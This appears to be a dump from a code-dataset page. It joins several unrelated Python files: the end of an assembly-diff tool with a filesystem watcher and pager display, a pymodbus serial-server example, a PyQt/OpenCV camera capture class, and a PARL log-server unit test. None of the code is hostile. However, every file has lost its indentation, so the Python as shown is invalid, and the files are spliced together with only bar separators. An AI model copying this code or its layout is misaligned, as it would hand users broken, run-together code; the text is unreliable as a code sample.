output.append((Text(), old_chunk[i], empty))
else:
assert isinstance(new_chunk, OutputLine)
assert new_chunk.base
# old_chunk.base and new_chunk.base have the same text since
# both diffs are based on the same target, but they might
# differ in color. Use the new version.
output.append((new_chunk.base, old_chunk, new_chunk))
# TODO: status line, with e.g. approximate permuter score?
header_line: Optional[Tuple[str, ...]]
diff_lines: List[Tuple[str, ...]]
if config.threeway:
header_line = ("TARGET", " CURRENT", " PREVIOUS")
diff_lines = [
(
fmt.apply(base),
fmt.apply(new.fmt2),
fmt.apply(old.fmt2) or "-" if old != new else "",
)
for (base, old, new) in output
]
else:
header_line = None
diff_lines = [
(fmt.apply(base), fmt.apply(new.fmt2))
for (base, old, new) in output
if base or new.key2 is not None
]
return header_line, diff_lines
def debounced_fs_watch(
targets: List[str],
outq: "queue.Queue[Optional[float]]",
config: Config,
project: ProjectSettings,
) -> None:
import watchdog.events # type: ignore
import watchdog.observers # type: ignore
class WatchEventHandler(watchdog.events.FileSystemEventHandler): # type: ignore
def __init__(
self, queue: "queue.Queue[float]", file_targets: List[str]
) -> None:
self.queue = queue
self.file_targets = file_targets
def on_modified(self, ev: object) -> None:
if isinstance(ev, watchdog.events.FileModifiedEvent):
self.changed(ev.src_path)
def on_moved(self, ev: object) -> None:
if isinstance(ev, watchdog.events.FileMovedEvent):
self.changed(ev.dest_path)
def should_notify(self, path: str) -> bool:
for target in self.file_targets:
if os.path.normpath(path) == target:
return True
if config.make and any(
path.endswith(suffix) for suffix in project.source_extensions
):
return True
return False
def changed(self, path: str) -> None:
if self.should_notify(path):
self.queue.put(time.time())
def debounce_thread() -> NoReturn:
listenq: "queue.Queue[float]" = queue.Queue()
file_targets: List[str] = []
event_handler = WatchEventHandler(listenq, file_targets)
observer = watchdog.observers.Observer()
observed = set()
for target in targets:
if os.path.isdir(target):
observer.schedule(event_handler, target, recursive=True)
else:
file_targets.append(os.path.normpath(target))
target = os.path.dirname(target) or "."
if target not in observed:
observed.add(target)
observer.schedule(event_handler, target)
observer.start()
while True:
t = listenq.get()
more = True
while more:
delay = t + DEBOUNCE_DELAY - time.time()
if delay > 0:
time.sleep(delay)
# consume entire queue
more = False
try:
while True:
t = listenq.get(block=False)
more = True
except queue.Empty:
pass
outq.put(t)
th = threading.Thread(target=debounce_thread, daemon=True)
th.start()
class Display:
basedump: str
mydump: str
config: Config
emsg: Optional[str]
last_diff_output: Optional[List[OutputLine]]
pending_update: Optional[Tuple[str, bool]]
ready_queue: "queue.Queue[None]"
watch_queue: "queue.Queue[Optional[float]]"
less_proc: "Optional[subprocess.Popen[bytes]]"
def __init__(self, basedump: str, mydump: str, config: Config) -> None:
self.config = config
self.basedump = basedump
self.mydump = mydump
self.emsg = None
self.last_diff_output = None
def run_diff(self) -> str:
if self.emsg is not None:
return self.emsg
diff_output = do_diff(self.basedump, self.mydump, self.config)
last_diff_output = self.last_diff_output or diff_output
if self.config.threeway != "base" or not self.last_diff_output:
self.last_diff_output = diff_output
header, diff_lines = format_diff(last_diff_output, diff_output, self.config)
return self.config.formatter.table(header, diff_lines[self.config.skip_lines :])
def run_less(self) -> "Tuple[subprocess.Popen[bytes], subprocess.Popen[bytes]]":
output = self.run_diff()
# Pipe the output through 'tail' and only then to less, to ensure the
# write call doesn't block. ('tail' has to buffer all its input before
# it starts writing.) This also means we don't have to deal with pipe
# closure errors.
buffer_proc = subprocess.Popen(
BUFFER_CMD, stdin=subprocess.PIPE, stdout=subprocess.PIPE
)
less_proc = subprocess.Popen(LESS_CMD, stdin=buffer_proc.stdout)
assert buffer_proc.stdin
assert buffer_proc.stdout
buffer_proc.stdin.write(output.encode())
buffer_proc.stdin.close()
buffer_proc.stdout.close()
return (buffer_proc, less_proc)
def run_sync(self) -> None:
proca, procb = self.run_less()
procb.wait()
proca.wait()
def run_async(self, watch_queue: "queue.Queue[Optional[float]]") -> None:
self.watch_queue = watch_queue
self.ready_queue = queue.Queue()
self.pending_update = None
dthread = threading.Thread(target=self.display_thread)
dthread.start()
self.ready_queue.get()
def display_thread(self) -> None:
proca, procb = self.run_less()
self.less_proc = procb
self.ready_queue.put(None)
while True:
ret = procb.wait()
proca.wait()
self.less_proc = None
if ret != 0:
# fix the terminal
os.system("tput reset")
if ret != 0 and self.pending_update is not None:
# killed by program with the intent to refresh
msg, error = self.pending_update
self.pending_update = None
if not error:
self.mydump = msg
self.emsg = None
else:
self.emsg = msg
proca, procb = self.run_less()
self.less_proc = procb
self.ready_queue.put(None)
else:
# terminated by user, or killed
self.watch_queue.put(None)
self.ready_queue.put(None)
break
def progress(self, msg: str) -> None:
# Write message to top-left corner
sys.stdout.write("\x1b7\x1b[1;1f{}\x1b8".format(msg + " "))
sys.stdout.flush()
def update(self, text: str, error: bool) -> None:
if not error and not self.emsg and text == self.mydump:
self.progress("Unchanged. ")
return
self.pending_update = (text, error)
if not self.less_proc:
return
self.less_proc.kill()
self.ready_queue.get()
def terminate(self) -> None:
if not self.less_proc:
return
self.less_proc.kill()
self.ready_queue.get()
def main() -> None:
args = parser.parse_args()
# Apply project-specific configuration.
settings: Dict[str, Any] = {}
diff_settings.apply(settings, args) # type: ignore
project = create_project_settings(settings)
config = create_config(args, project)
if config.algorithm == "levenshtein":
try:
import Levenshtein
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
if config.source:
try:
import cxxfilt
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
if config.threeway and not args.watch:
fail("Threeway diffing requires -w.")
if args.diff_elf_symbol:
make_target, basecmd, mycmd = dump_elf(
args.start, args.end, args.diff_elf_symbol, config, project
)
elif config.diff_obj:
make_target, basecmd, mycmd = dump_objfile(
args.start, args.end, config, project
)
else:
make_target, basecmd, mycmd = dump_binary(args.start, args.end, config, project)
map_build_target_fn = getattr(diff_settings, "map_build_target", None)
if map_build_target_fn:
make_target = map_build_target_fn(make_target=make_target)
if args.write_asm is not None:
mydump = run_objdump(mycmd, config, project)
with open(args.write_asm, "w") as f:
f.write(mydump)
print(f"Wrote assembly to {args.write_asm}.")
sys.exit(0)
if args.base_asm is not None:
with open(args.base_asm) as f:
basedump = f.read()
else:
basedump = run_objdump(basecmd, config, project)
mydump = run_objdump(mycmd, config, project)
display = Display(basedump, mydump, config)
if args.no_pager or args.format == "html":
print(display.run_diff())
elif not args.watch:
display.run_sync()
else:
if not args.make:
yn = input(
"Warning: watch-mode (-w) enabled without auto-make (-m). "
"You will have to run make manually. Ok? (Y/n) "
)
if yn.lower() == "n":
return
if args.make:
watch_sources = None
watch_sources_for_target_fn = getattr(
diff_settings, "watch_sources_for_target", None
)
if watch_sources_for_target_fn:
watch_sources = watch_sources_for_target_fn(make_target)
watch_sources = watch_sources or project.source_directories
if not watch_sources:
fail("Missing source_directories config, don't know what to watch.")
else:
watch_sources = [make_target]
q: "queue.Queue[Optional[float]]" = queue.Queue()
debounced_fs_watch(watch_sources, q, config, project)
display.run_async(q)
last_build = 0.0
try:
while True:
t = q.get()
if t is None:
break
if t < last_build:
continue
last_build = time.time()
if args.make:
display.progress("Building...")
ret = run_make_capture_output(make_target, project)
if ret.returncode != 0:
display.update(
ret.stderr.decode("utf-8-sig", "replace")
or ret.stdout.decode("utf-8-sig", "replace"),
error=True,
)
continue
mydump = run_objdump(mycmd, config, project)
display.update(mydump, error=False)
except KeyboardInterrupt:
display.terminate()
if __name__ == "__main__":
main()
|
rtu_slave.py
|
#!/usr/bin/env python
'''
Pymodbus Asynchronous Server Example
--------------------------------------------------------------------------
The asynchronous server is a high performance implementation using the
twisted library as its backend. This allows it to scale to many thousands
of nodes which can be helpful for testing monitoring software.
'''
import logging
#---------------------------------------------------------------------------#
# import the various server implementations
#---------------------------------------------------------------------------#
#from pymodbus.server.async import StartTcpServer
#from pymodbus.server.async import StartUdpServer
from pymodbus.server.asynchronous import StartSerialServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSequentialDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer
from os import readlink
class ModbusSerialServer:
#---------------------------------------------------------------------------#
# configure the service logging
#---------------------------------------------------------------------------#
log = logging.getLogger("ModbusServer")
serialPort = readlink('/tmp/pts1')
def _start_rtu_server(self, framer=ModbusRtuFramer):
# @req an open and existing /tmp/pts0 is required
#---------------------------------------------------------------------------#
# initialize your data store
#---------------------------------------------------------------------------#
# The datastores only respond to the addresses that they are initialized to.
# Therefore, if you initialize a DataBlock to addresses from 0x00 to 0xFF, a
# request to 0x100 will respond with an invalid address exception. This is
# because many devices exhibit this kind of behavior (but not all)::
#
# block = ModbusSequentialDataBlock(0x00, [0]*0xff)
#
# Continuing, you can choose to use a sequential or a sparse DataBlock in
# your data context. The difference is that the sequential has no gaps in
# the data while the sparse can. Once again, there are devices that exhibit
# both forms of behavior::
#
# block = ModbusSparseDataBlock({0x00: 0, 0x05: 1})
# block = ModbusSequentialDataBlock(0x00, [0]*5)
#
# Alternately, you can use the factory methods to initialize the DataBlocks
# or simply do not pass them to have them initialized to 0x00 on the full
# address range::
#
# store = ModbusSlaveContext(di = ModbusSequentialDataBlock.create())
# store = ModbusSlaveContext()
#
# Finally, you are allowed to use the same DataBlock reference for every
# table or you you may use a seperate DataBlock for each table. This depends
# if you would like functions to be able to access and modify the same data
# or not::
#
# block = ModbusSequentialDataBlock(0x00, [0]*0xff)
# store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)
#
# The server then makes use of a server context that allows the server to
# respond with different slave contexts for different unit ids. By default
# it will return the same context for every unit id supplied (broadcast
# mode). However, this can be overloaded by setting the single flag to False
# and then supplying a dictionary of unit id to context mapping::
#
# slaves = {
# 0x01: ModbusSlaveContext(...),
# 0x02: ModbusSlaveContext(...),
# 0x03: ModbusSlaveContext(...),
# }
# context = ModbusServerContext(slaves=slaves, single=False)
#
# The slave context can also be initialized in zero_mode which means that a
# request to address(0-7) will map to the address (0-7). The default is
# False which is based on section 4.4 of the specification, so address(0-7)
# will map to (1-8)::
#
# store = ModbusSlaveContext(..., zero_mode=True)
#---------------------------------------------------------------------------#
store = ModbusSlaveContext(
di = ModbusSequentialDataBlock(0, [True]*8), # discrete inputs
co = ModbusSequentialDataBlock(0, [False]*8), # coils
hr = ModbusSequentialDataBlock(0, [0]*8), # holding regs
ir = ModbusSequentialDataBlock(0, list(range(8))), # input regs
zero_mode=True) # request(0-7) will map to the address (0-7)
context = ModbusServerContext(slaves=store, single=True)
#---------------------------------------------------------------------------#
# initialize the server information
#---------------------------------------------------------------------------#
# If you don't set this or any fields, they are defaulted to empty strings.
#---------------------------------------------------------------------------#
identity = ModbusDeviceIdentification()
identity.VendorName = 'Pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/bashwork/pymodbus/'
identity.ProductName = 'Pymodbus Server'
identity.ModelName = 'Pymodbus Server'
identity.MajorMinorRevision = '1.0'
#---------------------------------------------------------------------------#
# run the server you want
#---------------------------------------------------------------------------#
#StartTcpServer(context, identity=identity, address=("localhost", 5020))
#StartUdpServer(context, identity=identity, address=("localhost", 502))
StartSerialServer(context, identity=identity, port=self.serialPort, baudrate=19200, framer=framer)
#StartSerialServer(context, identity=identity, port='/dev/pts/3', framer=ModbusAsciiFramer)
p = None
def start(self):
from multiprocessing import Process
self.p = Process(target=self._start_rtu_server) #args=('bob',)
self.p.daemon = True
self.p.start()
print("p.start done")
def kill(self):
self.log.info("Going to terminate the process, this could throw exceptions")
if self.p is not None:
self.p.terminate()
if __name__ == '__main__':
mbs = ModbusSerialServer()
mbs._start_rtu_server()
#mbs.start()
#import time
#time.sleep(3600)
#mbs.kill()
|
cvcapture.py
|
import numpy as np
import threading
import cv2
from PyQt5 import QtCore, QtGui, QtQml
gray_color_table = [QtGui.qRgb(i, i, i) for i in range(256)]
class CVAbstractFilter(QtCore.QObject):
def process_image(self, src):
dst = src
return dst
class CVCapture(QtCore.QObject):
started = QtCore.pyqtSignal()
imageReady = QtCore.pyqtSignal()
indexChanged = QtCore.pyqtSignal()
def __init__(self, parent=None):
super(CVCapture, self).__init__(parent)
self._image = QtGui.QImage()
self._index = 0
self.m_videoCapture = cv2.VideoCapture()
self.m_timer = QtCore.QBasicTimer()
self.m_filters = []
self.m_busy = False
@QtCore.pyqtSlot()
@QtCore.pyqtSlot(int)
def start(self, *args):
if args:
self.setIndex(args[0])
self.m_videoCapture.release()
self.m_videoCapture = cv2.VideoCapture(self._index)
if self.m_videoCapture.isOpened():
self.m_timer.start(0, self)
self.started.emit()
@QtCore.pyqtSlot()
def stop(self):
self.m_timer.stop()
def timerEvent(self, e):
if e.timerId() != self.m_timer.timerId(): return
ret, frame = self.m_videoCapture.read()
if not ret:
self.m_timer.stop()
return
if not self.m_busy:
threading.Thread(target=self.process_image, args=(np.copy(frame),)).start()
@QtCore.pyqtSlot(np.ndarray)
def process_image(self, frame):
self.m_busy = True
for f in self.m_filters:
frame = f.process_image(frame)
image = CVCapture.ToQImage(frame)
self.m_busy = False
QtCore.QMetaObject.invokeMethod(self,
"setImage",
QtCore.Qt.QueuedConnection,
QtCore.Q_ARG(QtGui.QImage, image))
@staticmethod
def ToQImage(im):
if im is None:
return QtGui.QImage()
if im.dtype == np.uint8:
if len(im.shape) == 2:
qim = QtGui.QImage(im.data, im.shape[1], im.shape[0], im.strides[0], QtGui.QImage.Format_Indexed8)
qim.setColorTable(gray_color_table)
return qim.copy()
elif len(im.shape) == 3:
if im.shape[2] == 3:
w, h, _ = im.shape
rgb_image = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
flip_image = cv2.flip(rgb_image, 1)
qim = QtGui.QImage(flip_image.data, h, w, QtGui.QImage.Format_RGB888)
return qim.copy()
return QtGui.QImage()
def image(self):
return self._image
@QtCore.pyqtSlot(QtGui.QImage)
def setImage(self, image):
if self._image == image: return
self._image = image
self.imageReady.emit()
def index(self):
return self._index
def setIndex(self, index):
if self._index == index: return
self._index = index
self.indexChanged.emit()
@QtCore.pyqtProperty(QtQml.QQmlListProperty)
def filters(self):
return QtQml.QQmlListProperty(CVAbstractFilter, self, self.m_filters)
image = QtCore.pyqtProperty(QtGui.QImage, fget=image, notify=imageReady)
index = QtCore.pyqtProperty(int, fget=index, fset=setIndex, notify=indexChanged)
|
log_server_test.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import multiprocessing
import os
import pickle
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import requests
requests.adapters.DEFAULT_RETRIES = 5
import parl
from parl.remote.client import disconnect, get_global_client
from parl.remote.master import Master
from parl.remote.worker import Worker
from parl.utils import _IS_WINDOWS
@parl.remote_class
class Actor(object):
def __init__(self, number=None, arg1=None, arg2=None):
self.number = number
self.arg1 = arg1
self.arg2 = arg2
print("Init actor...")
self.init_output = "Init actor...\n"
def sim_output(self, start, end):
output = ""
print(self.number)
output += str(self.number)
output += "\n"
for i in range(start, end):
print(i)
output += str(i)
output += "\n"
return self.init_output + output
class TestLogServer(unittest.TestCase):
def tearDown(self):
disconnect()
#In windows, multiprocessing.Process cannot run the method of class, but static method is ok.
@staticmethod
def _connect_and_create_actor(cluster_addr):
parl.connect(cluster_addr)
outputs = []
for i in range(2):
actor = Actor(number=i)
ret = actor.sim_output(1, 4)
assert ret != ""
outputs.append(ret)
return outputs
def test_log_server(self):
master_port = 8401
# start the master
master = Master(port=master_port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(1)
cluster_addr = 'localhost:{}'.format(master_port)
log_server_port = 8402
worker = Worker(cluster_addr, 4, log_server_port=log_server_port)
outputs = self._connect_and_create_actor(cluster_addr)
# Get status
status = master._get_status()
client_jobs = pickle.loads(status).get('client_jobs')
self.assertIsNotNone(client_jobs)
# Get job id
client = get_global_client()
jobs = client_jobs.get(client.client_id)
self.assertIsNotNone(jobs)
for job_id, log_server_addr in jobs.items():
log_url = "http://{}/get-log".format(log_server_addr)
# Test response without job_id
r = requests.get(log_url)
self.assertEqual(r.status_code, 400)
# Test normal response
r = requests.get(log_url, params={'job_id': job_id})
self.assertEqual(r.status_code, 200)
log_content = json.loads(r.text).get('log')
self.assertIsNotNone(log_content)
log_content = log_content.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
# Test download
download_url = "http://{}/download-log".format(log_server_addr)
r = requests.get(download_url, params={'job_id': job_id})
self.assertEqual(r.status_code, 200)
log_content = r.text.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
disconnect()
worker.exit()
master.exit()
def test_monitor_query_log_server(self):
master_port = 8403
monitor_port = 8404
# start the master
master = Master(port=master_port, monitor_port=monitor_port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(1)
# start the cluster monitor
monitor_file = __file__.replace('log_server_test.pyc', '../monitor.py')
monitor_file = monitor_file.replace('log_server_test.py',
'../monitor.py')
command = [
sys.executable, monitor_file, "--monitor_port",
str(monitor_port), "--address", "localhost:" + str(master_port)
]
if _IS_WINDOWS:
FNULL = tempfile.TemporaryFile()
else:
FNULL = open(os.devnull, 'w')
monitor_proc = subprocess.Popen(
command,
stdout=FNULL,
stderr=subprocess.STDOUT,
)
# Start worker
cluster_addr = 'localhost:{}'.format(master_port)
log_server_port = 8405
worker = Worker(cluster_addr, 4, log_server_port=log_server_port)
# Test monitor API
outputs = self._connect_and_create_actor(cluster_addr)
time.sleep(5) # Wait for the status update
client = get_global_client()
jobs_url = "{}/get-jobs?client_id={}".format(master.monitor_url,
client.client_id)
r = requests.get(jobs_url)
self.assertEqual(r.status_code, 200)
data = json.loads(r.text)
for job in data:
log_url = job.get('log_url')
self.assertIsNotNone(log_url)
r = requests.get(log_url)
self.assertEqual(r.status_code, 200)
log_content = json.loads(r.text).get('log')
self.assertIsNotNone(log_content)
log_content = log_content.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
# Test download
download_url = job.get('download_url')
r = requests.get(download_url)
self.assertEqual(r.status_code, 200)
log_content = r.text.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
# Clean context
monitor_proc.kill()
monitor_proc.wait()
disconnect()
worker.exit()
master.exit()
if __name__ == '__main__':
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.